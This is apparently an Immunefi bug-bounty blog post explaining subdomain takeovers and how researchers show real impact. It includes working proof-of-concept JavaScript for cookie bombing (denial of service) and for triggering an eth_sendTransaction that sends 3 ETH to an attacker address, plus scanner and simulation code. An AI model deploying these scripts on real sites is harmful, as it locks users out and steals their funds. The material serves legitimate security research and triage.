Subdomain Takeover Bugs — When They’re Applicable And When They’re Not

At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking them as Not Applicable, unless they’re supplemented with more information on how this vulnerability can be used to impact the core application.

This article is about what subdomain takeovers are and how they can be used to impact the core application of a project. Showing how the core application can be impacted is required to receive a bug bounty payout on Immunefi for this attack vector.

What Is a Subdomain Takeover?

A subdomain takeover happens when a DNS record for a subdomain (most often a CNAME) still points at an external domain or hosting resource that has since been released, and an attacker registers or claims that target. The subdomain then serves whatever the attacker hosts, even though the parent domain's zone was never touched.

Let’s take a look at an example of takeover.immunefi.com

  • takeover.immunefi.com has a CNAME that points to another domain, e.g., not-immunefi.eth
  • not-immunefi.eth expires for some reason and can now be registered by anyone
  • Whoever now owns not-immunefi.eth controls the content served at takeover.immunefi.com, because the CNAME record was never removed from the DNS zone and still points at the attacker-controlled name

MDN Web Docs has a wonderful description of the subdomain takeover problem, which is available here for further reading. In short, it gives an attacker the ability to host malicious content, distribute exploits, and so on.
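The precondition described above (a CNAME whose target no longer resolves) can be checked mechanically. The following is an added example, not code from the Immunefi post: it classifies the CNAME records of a zone by whether the target's registrable domain is unregistered (anyone can buy it), whether only the target host is missing (typically an unclaimed resource on a third-party service that has to be verified by hand), or whether the target still resolves. The zone and the set of "live" names are constructed for the offline run; the `.test` names, the record format and the two-label registrable-domain rule are assumptions, and a real scan should use the Public Suffix List instead of that rule.

```javascript
// Added example (not from the Immunefi post): find CNAME records whose
// targets no longer resolve, the precondition for a subdomain takeover.

// Naive registrable-domain extraction: keep the last two labels.
// Assumption: fine for .com/.finance style TLDs; a real scan should use the
// Public Suffix List (e.g. the `psl` npm package) so that foo.co.uk works.
function registrableDomain(host) {
  const labels = host.toLowerCase().replace(/\.$/, '').split('.');
  return labels.slice(-2).join('.');
}

// records: [{ name, type, target }]; exists(name) -> true if the name
// resolves to anything at all. Returns one finding per CNAME record.
function findDanglingCnames(records, exists) {
  const findings = [];
  for (const r of records) {
    if (r.type !== 'CNAME') continue;
    const target = r.target.replace(/\.$/, '').toLowerCase();
    const apex = registrableDomain(target);
    let status;
    if (!exists(apex)) status = 'apex-unregistered';      // the whole target domain can be registered
    else if (!exists(target)) status = 'target-unclaimed'; // domain lives, host does not: check the hosting service
    else status = 'ok';
    findings.push({ name: r.name, target, apex, status });
  }
  return findings;
}

// Only the records worth a closer look.
function takeoverCandidates(findings) {
  return findings.filter((f) => f.status !== 'ok');
}

// Live variant for a real zone (not exercised offline). Assumption: with
// dns.promises.resolve4, NXDOMAIN surfaces as ENOTFOUND, while ENODATA or
// server errors mean the name exists, so only ENOTFOUND counts as "missing".
async function buildExistenceMap(records) {
  const dns = require('dns').promises;
  const live = new Map();
  for (const r of records) {
    if (r.type !== 'CNAME') continue;
    const target = r.target.replace(/\.$/, '').toLowerCase();
    for (const name of [target, registrableDomain(target)]) {
      if (live.has(name)) continue;
      try {
        await dns.resolve4(name);
        live.set(name, true);
      } catch (e) {
        live.set(name, e.code !== 'ENOTFOUND');
      }
    }
  }
  return live;
}

// Constructed sample zone (not real records) and constructed set of names
// that "resolve" for the offline run.
const SAMPLE_ZONE = [
  { name: 'takeover.immunefi.com', type: 'CNAME', target: 'not-immunefi.test.' },
  { name: 'docs.immunefi.com', type: 'CNAME', target: 'old-project.pages.test.' },
  { name: 'www.immunefi.com', type: 'CNAME', target: 'cdn.test.' },
  { name: 'immunefi.com', type: 'A', target: '192.0.2.10' },
];
const SAMPLE_LIVE = new Set(['pages.test', 'cdn.test']);

if (typeof require !== 'undefined' && require.main === module) {
  const findings = findDanglingCnames(SAMPLE_ZONE, (h) => SAMPLE_LIVE.has(h));
  console.log(takeoverCandidates(findings));
}
```

For a real zone, replace the constructed `SAMPLE_LIVE` lookup with `await buildExistenceMap(zone)` and pass `(h) => live.get(h)`; a `target-unclaimed` finding only becomes a takeover if the hosting service behind the apex lets anyone claim that hostname, which the script cannot decide for you.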

Immunefi rejects the majority of these submissions because we apply strict triaging and only accept a list of specific impacts that are listed in each bug bounty program’s policy.

A few commonly accepted impacts for web applications are: DoS, initiating fake transactions, loss of user funds, and spoofing other users.

We encourage everyone to read our program policies carefully, keep the accepted impacts in mind, and try to chain OOS (out of scope) bugs into an impact on in-scope assets.

Assuming you have complete control of the vulnerable subdomain, the following are a few excellent reports that we want to share with our web hacking community, showing how some Immunefi researchers chained OOS findings into accepted impacts and earned bounties.

Cookie Bombing Leading to DoS

Cookie bombing is a common attack vector that you can demonstrate. The idea is to set a large number of oversized cookies in the victim's browser, scoped to the project's parent domain, so that every subsequent request to the web application carries more header data than the server accepts. The victim is locked out until they manually clear their cookies.

var base_domain = '.example.finance'; // parent domain of the taken-over subdomain
var pollution = Array(4000).join('a'); // 3999-character value, just under the ~4 KB per-cookie cap
for (var i = 1; i < 99; i++) {
  document.cookie = 'bomb' + i + '=' + pollution + ';Domain=' + base_domain + ';Path=/';
}

Hosting the above script on the taken-over subdomain sets 98 cookies of roughly 4 KB each on the parent domain, so every request the victim then makes to the main application carries close to 400 KB of Cookie headers. Most servers cap total request header size (defaults are typically in the 8 to 16 KB range), and once that threshold is exceeded the server answers 413 or 431 instead of serving the page. This financially impacts the project, as the victim cannot interact with the application. Cookie bombing that leads to DoS qualifies as the low severity impact "temporarily disabling user access to target site".
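To see why a cookie set from the taken-over subdomain hurts the main application, and to put numbers on the DoS claim, here is an added example that is not part of the Immunefi post. It implements a minimal browser-style cookie jar that applies the RFC 6265 domain-matching rule and the per-cookie size cap, replays the cookie bomb from the subdomain, and measures the Cookie header a request to the main application would carry against common server header limits. The hostnames `takeover.example.finance` and `app.example.finance`, the 4096-byte per-cookie cap, and the 8 KB (nginx `large_client_header_buffers`) and 16 KB (Node `--max-http-header-size`) limits are assumptions; browser per-domain cookie count limits are not modelled.

```javascript
// Added example (not from the Immunefi post): a tiny cookie jar that mimics
// the two browser rules that matter for cookie bombing, then sizes the
// resulting Cookie header against typical server limits.
const MAX_COOKIE_BYTES = 4096; // assumption: name+value cap enforced by current browsers
const SERVER_HEADER_LIMITS = {
  nginx_default_buffer: 8 * 1024,   // assumption: large_client_header_buffers 4 8k
  node_http_default: 16 * 1024,     // assumption: --max-http-header-size default
};

// RFC 6265 domain-match: host equals the cookie domain or is a subdomain of it.
function domainMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

class CookieJar {
  constructor() {
    this.cookies = new Map(); // key: domain|path|name
  }

  // Emulates `document.cookie = cookieString` executed on a page at setterHost.
  // Returns false when a browser would silently drop the cookie.
  set(setterHost, cookieString) {
    const host = setterHost.toLowerCase();
    const [pair, ...attrs] = cookieString.split(';').map((s) => s.trim());
    const eq = pair.indexOf('=');
    const name = pair.slice(0, eq);
    const value = pair.slice(eq + 1);
    if (name.length + value.length > MAX_COOKIE_BYTES) return false; // oversized: dropped
    let domain = host;
    let path = '/';
    for (const attr of attrs) {
      const [k, v = ''] = attr.split('=');
      if (k.toLowerCase() === 'domain') domain = v.replace(/^\./, '').toLowerCase();
      if (k.toLowerCase() === 'path') path = v;
    }
    // A page may only set cookies for its own host or a parent domain.
    if (!domainMatches(host, domain)) return false;
    this.cookies.set(`${domain}|${path}|${name}`, { name, value, domain, path });
    return true;
  }

  // The Cookie header a request to host + path would carry.
  headerFor(host, path = '/') {
    const parts = [];
    for (const c of this.cookies.values()) {
      if (domainMatches(host.toLowerCase(), c.domain) && path.startsWith(c.path)) {
        parts.push(`${c.name}=${c.value}`);
      }
    }
    return parts.join('; ');
  }
}

// Replays the post's bomb: 98 cookies with a 3999-character value
// (Array(4000).join('a')), scoped to the parent domain.
function cookieBomb(jar, attackerHost, baseDomain, count = 98, valueLen = 3999) {
  const pollution = 'a'.repeat(valueLen);
  let accepted = 0;
  for (let i = 1; i <= count; i++) {
    if (jar.set(attackerHost, `bomb${i}=${pollution};Domain=${baseDomain};Path=/`)) accepted++;
  }
  return accepted;
}

// Size the header the main application receives and list the limits it breaks.
function assessDos(jar, victimHost) {
  const cookieHeaderBytes = Buffer.byteLength(jar.headerFor(victimHost));
  const exceeded = Object.entries(SERVER_HEADER_LIMITS)
    .filter(([, limit]) => cookieHeaderBytes > limit)
    .map(([name]) => name);
  return { cookieHeaderBytes, exceeded };
}

// Constructed hosts for the offline run.
const ATTACKER_HOST = 'takeover.example.finance';
const VICTIM_APP_HOST = 'app.example.finance';

if (typeof require !== 'undefined' && require.main === module) {
  const jar = new CookieJar();
  const accepted = cookieBomb(jar, ATTACKER_HOST, '.example.finance');
  console.log({ accepted, ...assessDos(jar, VICTIM_APP_HOST) });
}
```

The same jar also shows the boundary of the attack: a cookie whose `Domain` attribute is not a parent of the taken-over host is rejected, so the bomb only reaches applications under the domain that delegated the dangling subdomain.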

Initiating Malicious Transactions

One area of concern for projects with bug bounties on Immunefi is the ability to initiate/sign transactions. These issues are considered to be of critical severity.

Let's assume you can host JavaScript on the taken-over subdomain. So, how can we initiate a malicious transaction?

// ATTACKER_WALLET_ADDRESS is a placeholder for the attacker-owned address.
ethereum
  .request({ method: 'eth_requestAccounts' })
  .then(getAccount)
  .catch((err) => {
    console.error(err);
  });

function getAccount(accounts) {
  const account = accounts[0];
  send(account);
}

function send(account) {
  ethereum
    .request({
      method: 'eth_sendTransaction',
      params: [
        {
          from: account,
          to: ATTACKER_WALLET_ADDRESS,
          value: '0x29a2241af62c0000', // 3 ETH in wei
          gasPrice: '0x09184e72a000',  // 10,000 gwei
          gas: '0x2710',               // 10,000 gas units
        },
      ],
    })
    .then((txHash) => console.log(txHash))
    .catch((error) => console.error(error));
}

The above PoC uses the provider object that a wallet extension such as MetaMask injects into the page (window.ethereum) to ask the victim's wallet for an account and then to sign and broadcast a transfer of 3 ETH to an attacker-owned address.

The impact is that the signing prompt appears to come from the reputable project's own domain, so users have little reason to hesitate before approving the transaction.
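To run that flow without a browser or a wallet, and to see what the victim is actually asked to approve, here is an added example that is not part of the Immunefi post. It replaces window.ethereum with a stand-in that records every request the page makes, rebuilds the PoC transaction with the same hex quantities as above, and decodes the destination, the amount and the worst-case fee (gas times gasPrice for a legacy transaction) into ETH. The attacker address, the victim account and the returned transaction hash are constructed placeholders.

```javascript
// Added example (not from the Immunefi post): drive the eth_sendTransaction
// PoC against a stand-in provider and decode what the wallet prompt shows.
const ATTACKER_WALLET_ADDRESS = '0x000000000000000000000000000000000000dEaD'; // placeholder
const WEI_PER_ETH = 10n ** 18n;

// The transaction the PoC submits, with the quantities used in the post.
function buildDrainTransaction(account) {
  return {
    from: account,
    to: ATTACKER_WALLET_ADDRESS,
    value: '0x29a2241af62c0000', // 3 ETH in wei
    gasPrice: '0x09184e72a000',  // 10,000 gwei
    gas: '0x2710',               // 10,000 gas units
  };
}

// Render a wei amount as a decimal ETH string without floating point.
function formatEther(wei) {
  const whole = wei / WEI_PER_ETH;
  const frac = (wei % WEI_PER_ETH).toString().padStart(18, '0').replace(/0+$/, '');
  return frac ? `${whole}.${frac}` : `${whole}`;
}

// What a wallet prompt (or a triager) should look at: destination, amount,
// and the maximum fee the signer can be charged for a legacy transaction.
function describeTransaction(tx) {
  const valueWei = BigInt(tx.value);
  const maxFeeWei = BigInt(tx.gas) * BigInt(tx.gasPrice);
  return {
    to: tx.to,
    valueEth: formatEther(valueWei),
    maxFeeEth: formatEther(maxFeeWei),
    totalAtRiskEth: formatEther(valueWei + maxFeeWei),
  };
}

// Minimal EIP-1193 provider stand-in: records every request, returns a
// constructed account and a constructed transaction hash.
function makeMockProvider(account) {
  const requests = [];
  return {
    requests,
    async request({ method, params = [] }) {
      requests.push({ method, params });
      if (method === 'eth_requestAccounts') return [account];
      if (method === 'eth_sendTransaction') return '0x' + '11'.repeat(32);
      throw new Error(`mock provider: unsupported method ${method}`);
    },
  };
}

// The PoC flow from the post, written with async/await.
async function runPoc(ethereum) {
  const [account] = await ethereum.request({ method: 'eth_requestAccounts' });
  const tx = buildDrainTransaction(account);
  const txHash = await ethereum.request({ method: 'eth_sendTransaction', params: [tx] });
  return { txHash, tx };
}

// Constructed victim account for the offline run.
const VICTIM_ACCOUNT = '0x1111111111111111111111111111111111111111';

if (typeof require !== 'undefined' && require.main === module) {
  const provider = makeMockProvider(VICTIM_ACCOUNT);
  runPoc(provider).then(({ txHash, tx }) => {
    console.log({ txHash, requests: provider.requests.map((r) => r.method), ...describeTransaction(tx) });
  });
}
```

Running it shows the wallet is asked to move 3 ETH plus up to 0.1 ETH in fees to the attacker address, which is the figure a report should state when claiming the "initiating malicious transactions" impact.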

If you follow this guidance, you’ll be one step closer to claiming big bug bounties. But remember, if you submit a subdomain takeover bug that does not have an impact on an in-scope asset, it will be marked as Not Applicable.

If you’re a Web2 or Web3 developer who is finally thinking about a bug-hunting career in Web3, we got you. Check out our ultimate blockchain hacking guide, and start taking home some of the $84m in rewards available on Immunefi — the leading bug bounty platform for Web3.